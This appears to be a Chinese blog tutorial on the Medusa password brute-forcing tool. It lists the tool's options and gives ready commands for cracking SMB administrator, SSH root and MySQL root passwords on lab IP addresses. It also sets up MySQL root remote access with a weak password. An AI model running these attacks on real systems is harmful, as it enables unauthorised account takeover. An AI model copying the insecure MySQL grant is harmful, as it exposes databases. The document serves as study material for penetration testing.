本文只用作学习研究,请勿非法使用!!!
本文只用作学习研究,请勿非法使用!!!
本文只用作学习研究,请勿非法使用!!!
Medusa简介:
Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa 和 hydra 一样,同样属于在线密码破解工具。Medusa 是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper 以及 Web 表单的密码爆破工具。
官方网站:http://foofus.net/goons/jmk/medusa/medusa.html。
软件下载地址:https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz
medusa 命令选项:常用参数标红
-
-h [TEXT]:目标 IP
-
-H [FILE]:目标主机文件
-
-u [TEXT]:用户名
-
-U [FILE]:用户名文件
-
-p [TEXT]:密码
-
-P [FILE]:密码文件
-
-C [FILE]:组合条目文件
-
-O [FILE]:文件日志信息
-
-e [n/s/ns]:n 意为空密码,s 意为密码与用户名相同
-
-M [TEXT]:模块执行名称
-
-m [TEXT]:传递参数到模块
-
-d:显示所有的模块名称
-
-n [NUM]:使用非默认端口
-
-s:启用 SSL
-
-r [NUM]:重试间隔时间,默认为 3 秒
-
-t [NUM]:设定线程数量
-
-L:并行化,每个用户使用一个线程
-
-f:在任何主机上找到第一个账号/密码后,停止破解
-
-q:显示模块的使用信息
-
-v [NUM]:详细级别(0-6)
-
-w [NUM]:错误调试级别(0-10)
-
-V:显示版本
-
-Z [TEXT]:继续扫描上一次
-
-F:破解到一个正确的密码即退出
建议先更新在使用:
apt update
apt -y install medusa
Medusa工具破解windows文件共享密码:
medusa -M smbnt -h 192.168.137.132 -e ns -F -u administrator -P m.txt
Medusa工具破解Linux root用户登录密码:
medusa -M ssh -h 192.168.137.11 -e ns -F -u root -P m.txt
参数:
-
-t [NUM]:设定子进程数量
-
-O ssh.log:可以将成功破解的记录记录到文件中
medusa -M ssh -h 192.168.137.11 -u root -P ./m.txt -t 8 -O ./ssh.log
Medusa破解MySQL root用户登录密码:
Mysql 授权 root 用户允许远程登录:
mysql -uroot -p123456
grant all privileges on *.* to ‘root’@’%’identified by ‘123456’ with grant option;
exit
之后进行暴力破解:
medusa -M mysql -h 192.168.137.11 -e ns -F -u root -P m.txt
之后远程登录MySQL数据库:
暂无评论内容